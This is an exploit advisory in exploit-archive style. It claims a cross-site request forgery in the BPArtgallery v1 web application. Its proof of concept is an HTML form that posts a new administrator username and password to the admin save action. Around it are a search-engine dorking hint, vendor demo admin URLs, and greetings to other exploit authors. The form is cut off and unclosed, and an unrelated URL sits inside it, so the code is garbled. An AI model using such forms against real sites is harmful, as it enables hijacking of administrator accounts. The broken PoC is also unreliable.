============================================================================================================================
| # Title : BPArtgallery v1 cross site request forgery Vulnerability |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : windows 10 Français V.(Pro) |
| # Version : 1 |
| # Vendor : http://icloudcenter.net/demos/icart/ |
| # Dork : n/a |
============================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine
[+] File Disclosure : http://www.icloudcenter.net/demos/icart/admin/index.php/login.php
<form name="administrator" action="http://127.0.0.1/admin/administrators.php/login.php?aID=3&action=save" method="post">
<table border="0" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td class="infoBoxContent">TEXT_INFO_EDIT_INTRO</td>
</tr>
<tr>
<td class="infoBoxContent"><br>TEXT_INFO_USERNAME<br><input type="text" name="username" value="indoushka"></td>
</tr>
<tr>
<td class="infoBoxContent"><br>TEXT_INFO_NEW_PASSWORD<br><input type="password" name="password" maxlength="40"></td>
</tr>
<tr>
http://icloudcenter.net/demos/icapparel/admin/
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================